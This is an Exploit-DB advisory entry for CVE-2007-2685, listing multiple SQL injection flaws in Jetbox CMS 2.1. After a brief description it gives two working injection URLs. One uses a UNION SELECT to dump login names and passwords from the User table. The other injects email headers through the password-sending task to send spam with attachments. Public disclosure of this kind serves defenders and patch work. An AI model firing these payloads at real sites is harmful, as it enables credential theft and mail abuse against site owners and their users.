Jetbox CMS 2.1 - Multiple SQL Injection Vulnerabilities

2007-05-21T00:00:00
ID EDB-ID:30066
Type exploitdb
Reporter Jesper Jurcenoks
Modified 2007-05-21T00:00:00

Description

Jetbox CMS 2.1 Multiple SQL Injection Vulnerabilities. CVE-2007-2685 . Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/24077/info

Jetbox is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Jetbox 2.1 is vulnerable; other versions may also be affected. 


http://www.example.com/path//index.php?view=-1' UNION SELECT 1,CONCAT(`login`,'-',`user_password`),1,1,1,1,1,1,1,1,1,1 FROM `User` LIMIT 0,1%23

http://www.example.com/path//index.php?view=webuser&task=sendpw&login=-1' UNION SELECT 1,1,1,'spam1@mail.com%0ABcc: spam_address2@somedomain.com, spam_address2 somedomain.com, spam_address4@somedomain.com, spam_addressNsomedomain.com%0ASubject: Some Spam Subject%0AFrom: any_address@somedomain.com%0AMIME-Version: 1.0%0AContent-Type: multipart/mixed; boundary=Hacker;%0A%0A--Hacker%0ASome Spam Message%0A%0AContent-Type:text/html;name=any_file.html;%0AContent-Transfer-Encoding:8bit%0AContent-Disposition: attachment%0A%0AHTML File%0A%0A--Hacker--%0AOther text will be hide',1 FROM `user` %23